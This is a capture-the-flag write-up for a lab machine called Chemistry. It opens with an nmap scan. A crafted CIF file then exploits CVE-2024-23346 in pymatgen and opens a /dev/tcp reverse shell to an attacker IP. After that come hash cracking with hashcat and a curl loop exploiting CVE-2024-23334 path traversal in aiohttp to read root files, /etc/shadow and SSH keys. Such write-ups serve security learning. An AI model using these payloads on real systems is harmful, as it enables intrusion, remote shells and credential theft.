Explore the fundamentals of cybersecurity in the Chemistry Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
1
| 10.10.11.38 chemistry.htb
|
Script to add hosts automatically
1
2
3
| ip="10.10.11.38"
domain="chemistry.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
|
Mapping
1
| nmap -sCV chemistry.htb
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| Nmap scan report for chemistry.htb (10.10.11.38)
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.9.5)
|_http-title: Chemistry - Home
|_http-server-header: Werkzeug/3.0.3 Python/3.9.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
http://chemistry.htb:5000/
CVE-2024-23346
https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
listener
make the file example.cif
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.16/9001 0>&1\'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
|
Upload the file to http://chemistry.htb:5000/.
when the listener connect in the pwned machine.
in your local machine
1
2
| wget http://chemistry.htb:8000/instance/database.db
sqlite3 database.db
|
Brute Force the Hash
Use an hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.
1
2
3
4
5
| echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 0 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 0 /tmp/hash.txt --show
rm -rf /tmp/hash.txt
|
Forwad port 8080 and log with ssh
1
| ssh -L 8081:localhost:8080 rosa@chemistry.htb
|
1
| cat /home/rosa/user.txt
|
CVE-2024-23334
1
| dirb http://localhost:8080/
|
Scan the remote service directly. You may find:
1
| <http://localhost:8080/assets> (CODE:403|SIZE:14)
|
The server is running Python/3.9 aiohttp/3.9.1, which is vulnerable to CVE-2024-23334, allowing potential exploitation of assets.
On the remote machine, use the following script to exploit directory traversal without needing to set up a tunnel:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/root.txt"
for ((i=0; i<15; i++)); do
payload+="$string"
echo "[+] Testing with $payload$file"
status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
echo -e "\tStatus code --> $status_code"
if [[ $status_code -eq 200 ]]; then
curl -s --path-as-is "$url$payload$file"
break
fi
done
|
If you want to retrieve sensitive files, simply modify the file variable in the script to target files like root/.ssh/id_rsa or /etc/shadow and rerun the script: